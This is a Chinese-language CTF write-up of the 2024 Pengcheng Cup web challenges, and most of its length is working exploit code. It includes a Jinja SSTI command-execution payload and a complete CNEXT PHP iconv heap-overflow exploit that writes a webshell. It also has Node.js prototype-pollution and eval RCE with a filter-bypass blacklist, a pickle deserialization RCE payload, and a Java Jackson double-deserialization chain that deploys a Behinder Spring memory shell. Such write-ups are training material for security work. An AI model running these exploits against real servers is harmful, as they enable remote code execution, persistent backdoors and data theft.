2024鹏城杯web全wp

python口算-pcb2024

import requests
import re

url = "http://192.168.18.28"

# 定义计算表达式的函数
def calculate_expression(expression):
    # 使用正则表达式匹配数字和运算符
    tokens = re.findall(r'\d+|[+\-*/]', expression)

    # 将 tokens 列表组合成一个字符串并使用 eval 计算结果
    result = eval(''.join(tokens))

    return result


# 测试表达式
res = requests.get(url+"/calc")
print(res.text)
result = calculate_expression(res.text)

res = requests.get(url+f"?answer={result}&Submit=%E6%8F%90%E4%BA%A4")
print(res.text)

得到/static/f4dd790b-bc4e-48de-b717-903d433c597f

@app.route('/')
def index(solved=0):
    global current_expr

    # 前端计算
    .....
    .....
    # 通过计算

    username = 'ctfer!'
    if request.args.get('username'):
        username = request.args.get('username')
        if whitelist_filter(username,whitelist_patterns):
            if blacklist_filter(username):
                return render_template_string("filtered")
            else:
                print("你过关！")
        else:
            return render_template_string("filtered")
    return render_template('index.html', username=username, hint="f4dd790b-bc4e-48de-b717-903d433c597f")

目测是一个username的ssti，绕一下过滤，用$IFS绕空格

最终脚本

import requests
import re

url = "http://192.168.18.28"

# 定义计算表达式的函数
def calculate_expression(expression):
    # 使用正则表达式匹配数字和运算符
    tokens = re.findall(r'\d+|[+\-*/]', expression)

    # 将 tokens 列表组合成一个字符串并使用 eval 计算结果
    result = eval(''.join(tokens))
    return result

# 测试表达式
res = requests.get(url + "/calc")
result = calculate_expression(res.text)

params = {"answer": result}
data = {"username": "{{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat$IFS/f*').read()}}"}

res = requests.post(url, params=params, data=data)
print(res.text)

fileread-pcb2024

直接文件读取，但是找不到flag，打cnext

<?php
class cls1{
    var $cls;
    var $arr;
}


class cls2
{
    var $filename = 'php://filter/read=convert.base64-encode/resource=/proc/self/cmdline';
    var $txt = '';
}

$a = new cls1();
$a ->cls = new cls2();
$a ->arr = array("1"=>"fileput");

echo base64_encode(serialize($a));

exp：

#!/usr/bin/env python3

from __future__ import annotations

import base64
import zlib
from dataclasses import dataclass

from pwn import *
from requests.exceptions import ChunkedEncodingError, ConnectionError
from ten import *


HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")


class Remote:

    def __init__(self, url: str) -> None:
        self.url = url
        self.session = Session()

    def send(self, path: str) -> Response:

        path = 'O:4:"cls1":2:{s:3:"cls";O:4:"cls2":2:{s:8:"filename";s:'+ str(len(path))+':"'+ path +'";s:3:"txt";s:0:"";}s:3:"arr";a:1:{i:1;s:7:"fileput";}}'
        path = base64.encode(path)

        return self.session.get(self.url+"?ser={}".format(path))

    def download(self, path: str) -> bytes:
        path = f"php://filter/convert.base64-encode/resource={path}"
        response = self.send(path)
        data = response.re.search(b"Your file(.*)", flags=re.S).group(1)
        return base64.decode(data)


@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep_time", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
    "pad",
    "Number of 0x100 chunks to pad with. If the website makes a lot of heap "
    "operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
    """CNEXT exploit: RCE using a file read primitive in PHP."""

    url: str
    command: str
    sleep: int = 1
    heap: str = None
    pad: int = 20

    url = "http://192.168.18.24/"
    command = "echo '<?php system(\"/readflag\");'>/var/www/html/phpinfo.php"

    def __post_init__(self):
        self.remote = Remote(self.url)
        self.log = logger("EXPLOIT")
        self.info = {}
        self.heap = self.heap and int(self.heap, 16)

    def check_vulnerable(self) -> None:
        """Checks whether the target is reachable and properly allows for the various
        wrappers and filters that the exploit needs.
        """

        def safe_download(path: str) -> bytes:
            try:
                return self.remote.download(path)
            except ConnectionError:
                failure("Target not [b]reachable[/] ?")

        def check_token(text: str, path: str) -> bool:
            result = safe_download(path)
            return text.encode() == result

        text = tf.random.string(50).encode()
        base64 = b64(text, misalign=True).decode()
        path = f"data:text/plain;base64,{base64}"

        result = safe_download(path)

        if text not in result:
            msg_failure("Remote.download did not return the test string")
            print("--------------------")
            print(f"Expected test string: {text}")
            print(f"Got: {result}")
            print("--------------------")
            failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")

        msg_info("The [i]data://[/] wrapper works")

        text = tf.random.string(50)
        base64 = b64(text.encode(), misalign=True).decode()
        path = f"php://filter//resource=data:text/plain;base64,{base64}"
        if not check_token(text, path):
            failure("The [i]php://filter/[/] wrapper does not work")

        msg_info("The [i]php://filter/[/] wrapper works")

        text = tf.random.string(50)
        base64 = b64(compress(text.encode()), misalign=True).decode()
        path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"

        if not check_token(text, path):
            failure("The [i]zlib[/] extension is not enabled")

        msg_info("The [i]zlib[/] extension is enabled")

        msg_success("Exploit preconditions are satisfied")

    def get_file(self, path: str) -> bytes:
        with msg_status(f"Downloading [i]{path}[/]..."):
            return self.remote.download(path)

    def get_regions(self) -> list[Region]:
        maps = self.get_file("/proc/self/maps")
        maps = maps.decode()
        PATTERN = re.compile(
            r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
        )
        regions = []
        for region in table.split(maps, strip=True):
            if match := PATTERN.match(region):
                start = int(match.group(1), 16)
                stop = int(match.group(2), 16)
                permissions = match.group(3)
                path = match.group(4)
                if "/" in path or "[" in path:
                    path = path.rsplit(" ", 1)[-1]
                else:
                    path = ""
                current = Region(start, stop, permissions, path)
                regions.append(current)
            else:
                print(maps)
                failure("Unable to parse memory mappings")

        self.log.info(f"Got {len(regions)} memory regions")

        return regions

    def get_symbols_and_addresses(self) -> None:
        regions = self.get_regions()

        LIBC_FILE = "1.so"

        self.info["heap"] = self.heap or self.find_main_heap(regions)

        libc = self._get_region(regions, "libc-", "libc.so")

        self.download_file("/usr/lib/x86_64-linux-gnu/libc.so.6" ,LIBC_FILE)

        self.info["libc"] = ELF(LIBC_FILE, checksec=False)
        self.info["libc"].address = libc.start

    def _get_region(self, regions: list[Region], *names: str) -> Region:
        """Returns the first region whose name matches one of the given names."""
        for region in regions:
            if any(name in region.path for name in names):
                break
        else:
            failure("Unable to locate region")

        return region

    def download_file(self, remote_path: str, local_path: str) -> None:
        """Downloads `remote_path` to `local_path`"""
        data = self.get_file(remote_path)
        Path(local_path).write(data)

    def find_main_heap(self, regions: list[Region]) -> Region:

        heaps = [
            region.stop - HEAP_SIZE + 0x40
            for region in reversed(regions)
            if region.permissions == "rw-p"
            and region.size >= HEAP_SIZE
            and region.stop & (HEAP_SIZE - 1) == 0
            and region.path == ""
        ]

        if not heaps:
            failure("Unable to find PHP's main heap in memory")

        first = heaps[0]

        if len(heaps) > 1:
            heaps = ", ".join(map(hex, heaps))
            msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
        else:
            msg_info(f"Using [i]{hex(first)}[/] as heap")

        return first

    def run(self) -> None:
        self.check_vulnerable()
        self.get_symbols_and_addresses()
        self.exploit()

    def build_exploit_path(self) -> str:

        LIBC = self.info["libc"]
        ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
        ADDR_EFREE = LIBC.symbols["__libc_system"]
        ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]

        ADDR_HEAP = self.info["heap"]
        ADDR_FREE_SLOT = ADDR_HEAP + 0x20
        ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168

        ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10

        CS = 0x100

        # Pad needs to stay at size 0x100 at every step
        pad_size = CS - 0x18
        pad = b"\x00" * pad_size
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = compressed_bucket(pad)

        step1_size = 1
        step1 = b"\x00" * step1_size
        step1 = chunked_chunk(step1)
        step1 = chunked_chunk(step1)
        step1 = chunked_chunk(step1, CS)
        step1 = compressed_bucket(step1)


        step2_size = 0x48
        step2 = b"\x00" * (step2_size + 8)
        step2 = chunked_chunk(step2, CS)
        step2 = chunked_chunk(step2)
        step2 = compressed_bucket(step2)

        step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
        step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
        step2_write_ptr = chunked_chunk(step2_write_ptr)
        step2_write_ptr = compressed_bucket(step2_write_ptr)

        step3_size = CS

        step3 = b"\x00" * step3_size
        assert len(step3) == CS
        step3 = chunked_chunk(step3)
        step3 = chunked_chunk(step3)
        step3 = chunked_chunk(step3)
        step3 = compressed_bucket(step3)

        step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
        assert len(step3_overflow) == CS
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = compressed_bucket(step3_overflow)

        step4_size = CS
        step4 = b"=00" + b"\x00" * (step4_size - 1)
        step4 = chunked_chunk(step4)
        step4 = chunked_chunk(step4)
        step4 = chunked_chunk(step4)
        step4 = compressed_bucket(step4)

        step4_pwn = ptr_bucket(
            0x200000,
            0,
            # free_slot
            0,
            0,
            ADDR_CUSTOM_HEAP,  # 0x18
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            ADDR_HEAP,  # 0x140
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            size=CS,
        )

        step4_custom_heap = ptr_bucket(
            ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
        )

        step4_use_custom_heap_size = 0x140

        COMMAND = self.command
        COMMAND = f"kill -9 $PPID; {COMMAND}"
        if self.sleep:
            COMMAND = f"sleep {self.sleep}; {COMMAND}"
        COMMAND = COMMAND.encode() + b"\x00"

        assert (
                len(COMMAND) <= step4_use_custom_heap_size
        ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
        COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")

        step4_use_custom_heap = COMMAND
        step4_use_custom_heap = qpe(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)

        pages = (
                step4 * 3
                + step4_pwn
                + step4_custom_heap
                + step4_use_custom_heap
                + step3_overflow
                + pad * self.pad
                + step1 * 3
                + step2_write_ptr
                + step2 * 2
        )

        resource = compress(compress(pages))
        resource = b64(resource)
        resource = f"data:text/plain;base64,{resource.decode()}"

        filters = [
            # Create buckets
            "zlib.inflate",
            "zlib.inflate",

            # Step 0: Setup heap
            "dechunk",
            "convert.iconv.latin1.latin1",

            # Step 1: Reverse FL order
            "dechunk",
            "convert.iconv.latin1.latin1",

            # Step 2: Put fake pointer and make FL order back to normal
            "dechunk",
            "convert.iconv.latin1.latin1",

            # Step 3: Trigger overflow
            "dechunk",
            "convert.iconv.UTF-8.ISO-2022-CN-EXT",

            # Step 4: Allocate at arbitrary address and change zend_mm_heap
            "convert.quoted-printable-decode",
            "convert.iconv.latin1.latin1",
        ]
        filters = "|".join(filters)
        path = f"php://filter/read={filters}/resource={resource}"

        return path

    @inform("Triggering...")
    def exploit(self) -> None:
        path = self.build_exploit_path()
        start = time.time()

        try:
            self.remote.send(path)
        except (ConnectionError, ChunkedEncodingError):
            pass

        msg_print()

        if not self.sleep:
            msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
        elif start + self.sleep <= time.time():
            msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
        else:
            # Wrong heap, maybe? If the exploited suggested others, use them!
            msg_print("    [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")

        msg_print()


def compress(data) -> bytes:
    """Returns data suitable for `zlib.inflate`.
    """
    # Remove 2-byte header and 4-byte checksum
    return zlib.compress(data, 9)[2:-4]


def b64(data: bytes, misalign=True) -> bytes:
    payload = base64.encode(data)
    if not misalign and payload.endswith("="):
        raise ValueError(f"Misaligned: {data}")
    return payload.encode()


def compressed_bucket(data: bytes) -> bytes:
    """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
    return chunked_chunk(data, 0x8000)


def qpe(data: bytes) -> bytes:
    """Emulates quoted-printable-encode.
    """
    return "".join(f"={x:02x}" for x in data).upper().encode()


def ptr_bucket(*ptrs, size=None) -> bytes:
    """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
    if size is not None:
        assert len(ptrs) * 8 == size
    bucket = b"".join(map(p64, ptrs))
    bucket = qpe(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = compressed_bucket(bucket)

    return bucket


def chunked_chunk(data: bytes, size: int = None) -> bytes:
    if size is None:
        size = len(data) + 8
    keep = len(data) + len(b"\n\n")
    size = f"{len(data):x}".rjust(size - keep, "0")
    return size.encode() + b"\n" + data + b"\n"


@dataclass
class Region:
    """A memory region."""

    start: int
    stop: int
    permissions: str
    path: str

    @property
    def size(self) -> int:
        return self.stop - self.start


Exploit()

notadmin-pcb2024

js原型链污染

过滤了一堆

/const|var|let|return|subprocess|Array|constructor|load|push|mainModule|from|buffer|process|child_process|main|require|exec|this|eval|while|for|function|hex|char|base|"|'|\\|\[|\+|\*/ig

app.post('/login', (req, res) => {
  if (merge(tmp_user, req.body)) {
    if (tmp_user.secretKey == undefined) {
      tmp_user.secretKey = crypto.randomBytes(16).toString('hex');
    }
    if (User.verifyLogin(tmp_user.password)) {
      const token = jwt.sign({ username: tmp_user.username }, tmp_user.secretKey);
      res.send(`Login successful! Token: ${token}\nBut nothing happend~`);
    } else {
      res.send('Login failed!');
    }
  } else {
    res.send("Hacker denied!")
  }
});

app.get('/', (req, res) => {
  authenticateToken(req, res, () => {
    backcode = eval(tmp_user.code)
    res.send("something happend~")
  });
});

/login路由可以进行污染，在根路由有个eval，会调用tmp_user.code，只需要污染出一个code属性就可以rce了。

第一步是登录，不然在authenticateToken函数里会被踢出来。

可以直接污染key，让python签一个jwt，带着token去访问根路由，就可以执行命令了。

这里用反引号来代替引号，乱七八糟的字符可以直接用atob来base64加密绕过。那么就需要一层解密，只需要再获取一次eval就行了。

Reflect.get(global,Reflect.ownKeys(global).find(x=>x.includes(`eva`)))(atob(`{payload_b64}`))

虽然不出网，但是app.use(express.static(‘public’));暴露了public作为static静态目录，可以直接往这里面写。

payload：

global.process.mainModule.constructor._load("child_process").execSync("cat /flag > ./public/flag.txt")

exp：

import base64
import jwt
import requests

url = "http://192.168.18.21"
key = '123456'

#签一个token
data = {"username":"admin"}
token = jwt.encode(data,key,algorithm='HS256')
#print(token)

payload = 'global.process.mainModule.constructor._load("child_process").execSync("cat /flag > ./public/flag.txt")'
payload_b64 = base64.b64encode(payload.encode()).decode('utf-8')
#print(payload_b64)

#污染
json = {
    "secretKey":key,
    "code":f"Reflect.get(global,Reflect.ownKeys(global).find(x=>x.includes(`eva`)))(atob(`{payload_b64}`))"   #两层eval，外面的eval执行，里面的eval解密
}
requests.post(url+"/login",json=json)

#执行
requests.get(url,headers={"Authorization":token})

#读取flag
res = requests.get(url+"/flag.txt")
print(res.text)

ez_python-pcb2024

爆破账号密码为test/123456

得到一个jwt，爆破key为a123456，签一个admin的token就可以进去protected了，提示：听说ser有点东西

import pickle
import base64
def hhhhackme(pickled):
    data = base64.urlsafe_b64decode(pickled)
    deserialized = pickle.loads(data)
    return ''

是pickle反序列化，利用报错回显可以拿到flag

import pickle
import base64

class A(object):
    def __reduce__(self):
        return (exec, ("raise Exception(__import__('os').popen('cat /f*').read())",))

a = A()
print(base64.b64encode(pickle.dumps(a)))

LookUP-pcb2024

参考文章：

https://www.cnblogs.com/Goo1/p/17592281.html

https://xz.aliyun.com/t/12966#toc-34

黑名单ban了templatesimpl，又有jackson依赖，可以打二次反序列化

bad –> jackson –> signed –> bad –> jackson –> templatesimpl

不出网，打spring内存马

package com.test;

import com.Utils.Util;
import com.fasterxml.jackson.databind.node.POJONode;
import javassist.*;
import javax.management.BadAttributeValueExpException;
import java.io.IOException;

import static com.Utils.Util.setValue;

public class test {
    public static void main(String[] args) throws Exception{
        overrideJackson();
        Object templates1 = Util.getTemplates(Util.file2ByteArray("C:\\Users\\13664\\Documents\\JavaUtils\\target\\classes\\com\\Memshell\\spring\\BehinderControllerShell.class"));
        POJONode jsonNodes1 = new POJONode(templates1);
        Object pojoNodeStableProxy = Util.getPOJONodeStableProxy(jsonNodes1);

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(1);
        setValue(badAttributeValueExpException,"val",pojoNodeStableProxy);

        Object templates2 = Util.second_serialize(badAttributeValueExpException);
        POJONode jsonNodes2 = new POJONode(templates2);
        BadAttributeValueExpException badAttributeValueExpException1 = new BadAttributeValueExpException(2);
        setValue(badAttributeValueExpException1,"val",jsonNodes2);

        String serialize = Util.serialize(badAttributeValueExpException1);
        System.out.println(serialize);
        //Util.unserialize(serialize);

    }
    public static void overrideJackson() throws NotFoundException, CannotCompileException, IOException {
        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("com.fasterxml.jackson.databind.node.BaseJsonNode");
        CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
        ctClass.removeMethod(writeReplace);
//        writeReplace.setBody("return $0;");
        ctClass.writeFile();
        ctClass.toClass();
    }
}

ezlaravel-pcb2024

https://github.com/joshuavanderpoll/CVE-2021-3129

laravel爆破反序列化链，rce12可以